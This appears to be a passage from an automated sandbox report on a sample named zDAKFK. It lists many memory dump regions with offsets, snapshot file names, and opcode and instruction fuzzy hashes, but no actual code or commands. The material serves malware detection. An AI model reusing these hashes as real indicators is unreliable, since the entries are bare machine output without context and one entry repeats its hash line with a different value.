                                                                                                                                                                      • Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                                                                                                                                      • Instruction ID: 8870051f791399723db60cd4a628c567c502f68e1f8be95a597935cb3e1e66e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E210771504308DFDB05DF24D5C4B36BBA6FB84318F20C56DDB098B255C336E846CAA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 264043bebb3191551735ff3ee51d6774561d05643f0464023cb81117ec580136
                                                                                                                                                                      • Instruction ID: 325ce3051a1fd9ff1b4497e0fb8c54ac0c0bc715245dc8c2cdfe49323b7501d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 264043bebb3191551735ff3ee51d6774561d05643f0464023cb81117ec580136
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B11BF307142101BEB09B768C4257AF33D6ABC9B18F00446DE556DB3D6CFA5AD0287D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93db8b0f4811cf269e14bb1487eacff68c08e90f8144e0d33475a48d417f6d3b
• Instruction ID: cdb2bdbcbfc80ad6ceef13e066da56e7ae2b7b8382c9258c97ead7a6b6109a13
• Opcode Fuzzy Hash: 93db8b0f4811cf269e14bb1487eacff68c08e90f8144e0d33475a48d417f6d3b
• Instruction Fuzzy Hash: C911DD347086100BEB09BB3894557AE37D2ABC9708F0040AEE196CF7D6CFA5AD028796
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07e948ba1f754d79a74242b8bfe062a6333f48308accc7ee3c6e9ebadef83f41
• Instruction ID: b304b16f219a443301c4167d09392a7184bd9b503f928c68f1278fdd9dccced9
• Opcode Fuzzy Hash: 07e948ba1f754d79a74242b8bfe062a6333f48308accc7ee3c6e9ebadef83f41
• Instruction Fuzzy Hash: 7C1136B26006819FDB15EB38D855B9AB7F1EFC1314B00C47DE0198B652EB32ED4AC751
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0bcb4e4d529a2d8e7a56d5f47cb5419a3304531805ed88c1ab1abd8d1b0d723d
• Instruction ID: a183d55c6890dae67ba6eb0f9edc743ac11db89b194752af01bb04b4e8362eb1
• Opcode Fuzzy Hash: 0bcb4e4d529a2d8e7a56d5f47cb5419a3304531805ed88c1ab1abd8d1b0d723d
• Instruction Fuzzy Hash: AA113231B05B018BEB34DF29E491B27B3F2BB84780F140A2DE096CBA40D734F9088B91
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: beb0c379d7a7b81dde7b77c2dfb2538e1a2738d3c6b9f916e42b9c7af0de85d8
• Instruction ID: e371752652a9db5f88356b976d74af3264f2fdb76879ea1213e98aa53a4ff92e
• Opcode Fuzzy Hash: beb0c379d7a7b81dde7b77c2dfb2538e1a2738d3c6b9f916e42b9c7af0de85d8
• Instruction Fuzzy Hash: 181170307106105BEB09B768C425BAF72D6ABC8B18F00446DE5569B3D6CFA5AC4187D6
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae4ec7cab35fdb53616a400938adaa83e42ebdfc03591761a89eafb0a16c2316
• Instruction ID: d6730cff4c89f01e0f970ed1a9b597d3d36e20fe2baf96dfa983fe3531c404a3
• Opcode Fuzzy Hash: ae4ec7cab35fdb53616a400938adaa83e42ebdfc03591761a89eafb0a16c2316
• Instruction Fuzzy Hash: 7A11A3763442404FDB148B29D8D56A83BE6FFC6314B1D80BAE14ACF7A3D569EC0697A0
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e894fbaaffaf80d03b4e35bb6070c21c01e0780602b0f0f053a35810e8863e0
• Instruction ID: 9fd944ad41339442b184637f5b34418498870f2492d1470c1e1e72451e0c4b1e
• Opcode Fuzzy Hash: 7e894fbaaffaf80d03b4e35bb6070c21c01e0780602b0f0f053a35810e8863e0
• Instruction Fuzzy Hash: BB1166317062219FDF096725A814AFC7BE5DFC5709B09407AE809CB2A2CB25AC0397E1
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d62481b9379f966c4da4e02272832c34a731eacb8bb0954381e84a0feb5872cb
• Instruction ID: 8aca10b9d7b2adb3d0747ebe43c19715ba7523cce4df7e59351185b8a468db7f
• Opcode Fuzzy Hash: d62481b9379f966c4da4e02272832c34a731eacb8bb0954381e84a0feb5872cb
• Instruction Fuzzy Hash: B7118B31600644AFD719EB69D445BAAB7E6EFC1318F00C83DE1298B251DA36ED09C7A1
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4651aa86c45e97222f2a40cd9b441ad2f690f9fdedc572be0c7c28048e631acb
• Instruction ID: c8a4f3ca74ccc86459e57f8abc80eebe14cc3dfdd621169a03f0d4c2b69d430a
• Opcode Fuzzy Hash: 4651aa86c45e97222f2a40cd9b441ad2f690f9fdedc572be0c7c28048e631acb
• Instruction Fuzzy Hash: 48119E31B05B004BEB34DF29D44175AB7F2BF85794F040A2EE496CBA41D738F9098B92
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec4aaf406cceb2f35b872456340f4866b3d92d8a14ce1ee9af1f2c1899900469
• Instruction ID: 3e711246cf55561e2f21f58f4ffd399da81de0aee0b83ae2d334bed7413d9eda
• Opcode Fuzzy Hash: ec4aaf406cceb2f35b872456340f4866b3d92d8a14ce1ee9af1f2c1899900469
• Instruction Fuzzy Hash: 57214234600706CFDB54EB78C444AAAB3F6EF85319F10896DD4695B274DF71B88ACB81
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0bce1fda9a2258208e46edc28a00ba6d8264358f7f537debae081f412cede5d
• Instruction ID: fe1f7df886339f0417af2bf64b4930959bf45f3cafbea3f154586b2ce52c30ad
• Opcode Fuzzy Hash: b0bce1fda9a2258208e46edc28a00ba6d8264358f7f537debae081f412cede5d
• Instruction Fuzzy Hash: 6C218E35600706CFDB59EB78C444AAAB7F6EF85315F0084BDD0591B260DF31A88ACB81
Memory Dump Source
• Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: 3330c689c45aa7897cbb180579b3747aa3eeee490ab5a841e9b73db756940678
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction Fuzzy Hash: A311B176504380CFCB16CF14D9C4B16BF71FB94318F24C6AAD8494B656C336D85ACBA1
Memory Dump Source
• Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: 2626c95c78107abf64b95225c5b6695220254304b8c310642941d797f0a3205d
• Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction Fuzzy Hash: 7211BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACB91
Memory Dump Source
• Source File: 0000000C.00000002.1766294322.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_8fd000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: d2cfdcd8f217cc85eaa34925b9b3920171c4983938793c1bba417af50da9b747
• Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction Fuzzy Hash: 4A11BE75504784CFCB15CF24D5C4B25FB62FB84314F24C6AADA098B656C33AD80ACB61
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6cb3f4630a7b6e120fb425b85065665dfd55a268b5ab1bc9ff2ae854b3379337
• Instruction ID: de002c430284975c4024792a5049649c2e14925481e8b60525347e3768c10dd1
• Opcode Fuzzy Hash: 6cb3f4630a7b6e120fb425b85065665dfd55a268b5ab1bc9ff2ae854b3379337
• Instruction Fuzzy Hash: 901104B5C102098FDB10DFAAD544BDEFBF4EB49360F10C42AD859A7210D378A545CFA5
Memory Dump Source
• Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1dfad3f565b00f39a27b51121371690084edd2299a56e28d11d40f58ca1f50dd
                                                                                                                                                                      • Instruction ID: 2b42bfe61df5a4f8d1752a89bd088dba1af2f6ebc701a1e435f02a9f05cc13e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dfad3f565b00f39a27b51121371690084edd2299a56e28d11d40f58ca1f50dd
                                                                                                                                                                      • Instruction Fuzzy Hash: C401F271B093547BEB05DB7998144AEBFEADF8A124B1480AED84DC7341EA20EC428395
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5b78415cf658f642636a412c17e10698014a56496a12382ec2e3825e04b25246
                                                                                                                                                                      • Instruction ID: e8cd517d268bb3a2ef198f2ea590d55efd61ce40e17a975a55f33057b735ba8a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b78415cf658f642636a412c17e10698014a56496a12382ec2e3825e04b25246
                                                                                                                                                                      • Instruction Fuzzy Hash: FD1104B1D042489FDB10DFAAD444B9EFBF4EB49364F10C42AE859A7310D378A945CFA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b494bfde27ca65468d340622a11a8b8f32f4f9788f547ed64d073092fd4e25f7
                                                                                                                                                                      • Instruction ID: 672e1401372b1e87e152796a89ee9ea6e38978fc15d47315268e0718f618b765
                                                                                                                                                                      • Opcode Fuzzy Hash: b494bfde27ca65468d340622a11a8b8f32f4f9788f547ed64d073092fd4e25f7
                                                                                                                                                                      • Instruction Fuzzy Hash: 671145B59002488FCB20DF9AC588BDEFFF8EB48320F20841AD459A7310C334A985CFA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766232691.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_8ed000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ee1bba1f5ed17ef230f1400a78a938fd4476bbdd4a8aeb3b86a5bca4ef164f01
                                                                                                                                                                      • Instruction ID: ae6215f1b7e32eea668e60a5c590859cd9be5846e3196c1c2045be90f334bd94
                                                                                                                                                                      • Opcode Fuzzy Hash: ee1bba1f5ed17ef230f1400a78a938fd4476bbdd4a8aeb3b86a5bca4ef164f01
                                                                                                                                                                      • Instruction Fuzzy Hash: F3012B310083849AE7109F27CDC4B67BFD8FF42324F18C52AED198E286C279D884CAB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 73ae5cae4c5cd732d0d31c1bb57c144107d9ef039c63ae4e4dd95b3371c5ab3d
                                                                                                                                                                      • Instruction ID: 2a7d9bafe4715de86451993945e222ed7a6fa02a8f651e8a1131728ba05e6b80
                                                                                                                                                                      • Opcode Fuzzy Hash: 73ae5cae4c5cd732d0d31c1bb57c144107d9ef039c63ae4e4dd95b3371c5ab3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001B130A18298AFDF14DB65D490EDDBFF1BF4A314F144099E841FB361C675A901CB50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d779d484ea85168004f62f84cc038b6091671c4d537b56602196b3e3414b1936
                                                                                                                                                                      • Instruction ID: 3623cf1260dc377dbbe9345cb87094d870c5b0c08277ee2a88ef29d6afa0eeaf
                                                                                                                                                                      • Opcode Fuzzy Hash: d779d484ea85168004f62f84cc038b6091671c4d537b56602196b3e3414b1936
                                                                                                                                                                      • Instruction Fuzzy Hash: 85017D75B10251CFEF16B7789D804FE7BF19F88209F000069E104A7382CA302E1287F5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aea1cfe9a60ca8cf7fa5d446bca6950d014950ce3f8ff4b799e0e39da7ac3fc5
                                                                                                                                                                      • Instruction ID: 327565c26603363e173c3b86bdd2f9e0dab5307a84a8d35b4b8506f572b40fc5
                                                                                                                                                                      • Opcode Fuzzy Hash: aea1cfe9a60ca8cf7fa5d446bca6950d014950ce3f8ff4b799e0e39da7ac3fc5
                                                                                                                                                                      • Instruction Fuzzy Hash: CD1112B59003488FCB20DF9AC548BDEFBF8EB48320F20841AD559A7310C374A984CFA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 13369ad2ee3138268915557b6a56b9d94e1f38efa4d259cb123ec0b82c509329
                                                                                                                                                                      • Instruction ID: f8cc51a73d2bcb24b7d52fc552f86ebaae95791f67bc7f8f70ad6ede7b233554
                                                                                                                                                                      • Opcode Fuzzy Hash: 13369ad2ee3138268915557b6a56b9d94e1f38efa4d259cb123ec0b82c509329
                                                                                                                                                                      • Instruction Fuzzy Hash: FBF096313042619FDF25972AA4907FE27F6BF81A55B0900AAD846C7951DA24FC47D770
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ddefbda26473485270942ef1238430147d08cd4739b10172b0343dc6329feedb
                                                                                                                                                                      • Instruction ID: 45a8e5cf5b278bc3e21351ac32f038b67a5888cef2e4c88bed49cd4e6c85875e
                                                                                                                                                                      • Opcode Fuzzy Hash: ddefbda26473485270942ef1238430147d08cd4739b10172b0343dc6329feedb
                                                                                                                                                                      • Instruction Fuzzy Hash: EAF0BB75B10115DB9F25B7B89D504BFBBFADBC8615F000028E505A7340DE306E1187F5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b28caaa9b3d67998219d49336d6977a311ceeaa1d50fbb2a8063407d6c3c096d
                                                                                                                                                                      • Instruction ID: cdf47e479f9b6c921c6fa72fb238eaff9e05639f87ea413449a9c033fb19e40a
                                                                                                                                                                      • Opcode Fuzzy Hash: b28caaa9b3d67998219d49336d6977a311ceeaa1d50fbb2a8063407d6c3c096d
                                                                                                                                                                      • Instruction Fuzzy Hash: AFF0B4303042218BDF14DB2EA550AFB73EAAFC0A01708042AE406C3A50DA20FC01D770
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0108316313e8494294fc2bae6d16b261bdfbe90c1e30319c540aeb1733d41dc0
                                                                                                                                                                      • Instruction ID: 2386d6633a709d5992b156109257a4ec171798d6a47e6e8c1a2a95ef31452939
                                                                                                                                                                      • Opcode Fuzzy Hash: 0108316313e8494294fc2bae6d16b261bdfbe90c1e30319c540aeb1733d41dc0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c90503d02f4c289dbaf5663f4d5419a12dfaca02d03ed1a9d00316a79dc0570
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E07D3121C2521FEF47532518201D83FD1DD031D934D01F6C4C9C3063E90AED0342C1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 86d54da1c21092411919aac022883af01f8568bb412e94f097e6f30569dd741f
                                                                                                                                                                      • Instruction ID: 64c4bbdaf299493866a821eb80b981ccfa8ddb6a6c768d7efa627d415a0f4107
                                                                                                                                                                      • Opcode Fuzzy Hash: 86d54da1c21092411919aac022883af01f8568bb412e94f097e6f30569dd741f
                                                                                                                                                                      • Instruction Fuzzy Hash: 73F01571D09248EFCB01DFA8D5985CCBFB5FB09204F0081EAD909E7215EA345F4ACB80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4d719e8e5ec21741f694c04163a0e4a27dae12d34bdb4f78e8fe6f9a35f45aae
                                                                                                                                                                      • Instruction ID: 6e91fbeff60e4f568d116afd89e968da8df9bfbc40277183df1e90e10b9a4d5f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d719e8e5ec21741f694c04163a0e4a27dae12d34bdb4f78e8fe6f9a35f45aae
                                                                                                                                                                      • Instruction Fuzzy Hash: 33E01AB1A5121DFADF50AB91E5187EFBFF4FB89216F20041AD102B1650D7711948CA90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 31c687beedfc0748ce650973df9aa5e6916889175778bed06f2a7d963c67b60a
                                                                                                                                                                      • Instruction ID: f5ff5d23d1ff099fa65e3c5ac7fb27ea06acf89c92203b76e2fa17d6ed07ce9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 31c687beedfc0748ce650973df9aa5e6916889175778bed06f2a7d963c67b60a
                                                                                                                                                                      • Instruction Fuzzy Hash: BFE0C2303516049FCB18DB1CE88086AF3E9EF897107108FBAF04AC7324DA60FC054694
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f76b72fd31cc6a5646a38d7f8ddb3527c8979895701492556e05f1331af1ae5d
                                                                                                                                                                      • Instruction ID: 758f261f69074e5f8345c5bad2809229135ecbc300fb388c9c7fc8f4e6ca78f1
                                                                                                                                                                      • Opcode Fuzzy Hash: f76b72fd31cc6a5646a38d7f8ddb3527c8979895701492556e05f1331af1ae5d
                                                                                                                                                                      • Instruction Fuzzy Hash: 36E0D8322087C05FC703E26DD45058AEB92EFC621434989BBD185CB62AEA51AD0BC395
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 894a0daca40152d40f1f6874394df0aced225fa1853bf1c87a1773c3c3029ce8
                                                                                                                                                                      • Instruction ID: 26607d3b717791a5f8dc7b891338f0aaa6f55d0527368fcb5264f0ba7e715fa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 894a0daca40152d40f1f6874394df0aced225fa1853bf1c87a1773c3c3029ce8
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F0C275A04149CFDF14EFA8E6855ECB7F1EB8D319F2040AAC405B7250CB366E42CBA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e0bfc7c2fe61b28439ac2b35f99e307fa20a60d8a951779432ae89cabe7c75d7
                                                                                                                                                                      • Instruction ID: a64c36170885d7555d0943b0c7aa83aa6b83455e76058c851c2cfccbd33bce7f
                                                                                                                                                                      • Opcode Fuzzy Hash: e0bfc7c2fe61b28439ac2b35f99e307fa20a60d8a951779432ae89cabe7c75d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 57D0A7313181244B8F453BB5780816E33CCAFC9676700007EE50EC3260DE229C0042C4
                                                                                                                                                                      Memory Dump Source
